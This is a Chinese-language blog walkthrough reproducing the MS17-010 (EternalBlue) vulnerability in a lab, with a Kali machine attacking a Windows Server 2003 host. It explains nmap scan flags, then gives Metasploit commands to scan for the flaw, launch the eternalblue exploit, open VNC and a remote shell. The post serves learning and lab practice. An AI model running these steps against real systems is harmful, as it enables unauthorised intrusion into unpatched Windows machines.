ms17-010(永恒之蓝)漏洞复现

1. 复现环境

  • 攻击机:kali-Linux,ip:192.168.242.128

  • 靶机:Windows Server 2003, ip: 192.168.242.130

  • 工具:nmap、msf

2. 复现过程

2.1 nmap扫描靶机开放端口

nmap -T4 -A -v 192.168.242.134

-sS/sT/sA/sW/sM:TCP扫描

  • S是SYN扫描,半连接扫描,nmap只发送SYN报文,通过服务器是否响应SYN+ACK来判断对应端口是否开放
  • T是全连接扫描会和服务器建立完整的三次握手,效率低(上面的4代表时序,越高扫描越快)
  • A发送ACK报文,通过服务器响应来判断是否开放,有的服务器不开会回复ICMP端口不可达,当回复RST时表示可能被拦截或者端口开放,不是一个准确的判断条件
  • W 是窗口扫描,发出的报文和ACK一样,利用的是在某些系统中如果端口开放,收到ACK包后会响应一个窗口非0的RST包
  • M是Maimon扫描,使用发现者的名字命名。其原理是向目标服务器发送FIN/ACK 报文,在某些系统中如果端口开放则会丢弃该报文不做响应,如果端口关闭则回复RST或者ICMP,Nmap可借此判断服务器端口的开放情况。

-v:增加详细级别

-Pn:无ping扫描

-PS 指 TCP SYN Ping,
-PA 指 TCP ACK Ping,
-PU 指 UDP Ping

可以看到开放了445端口。

2.2 进入MSF框架找相应的扫描模块

msfconsole

search ms17-010

其中0是攻击模块,3是扫描模块

2.3 对靶机进行永恒之蓝扫描

use auxiliary/scanner/smb/smb_ms17_010
show options   //查看要设置的参数

Required栏中选项为yes的说明对应的Current Setting栏需要填写。

设置参数:

set rhosts 192.168.242.130    //设置要攻击的ip(或ip段)

设置完后可以再次使用show options检查。

完成后输入run执行扫描。

扫描完成,结果显示大概率可以利用永恒之蓝进行攻击。

2.4 调用攻击模块

use exploit/windows/smb/ms17_010_eternalblue(用于64位机)
这里由于该系统是32位的,所以用编号为1的攻击模块

然后同2.3中设置要攻击的ip,run进行攻击。

执行远程桌面:

run vnc

执行成功

ps查看靶机进程:

shell 进行反弹shell:

复现完毕。

posted @ 2024-03-19 19:41  LilDaily  阅读(477)  评论(0)    收藏  举报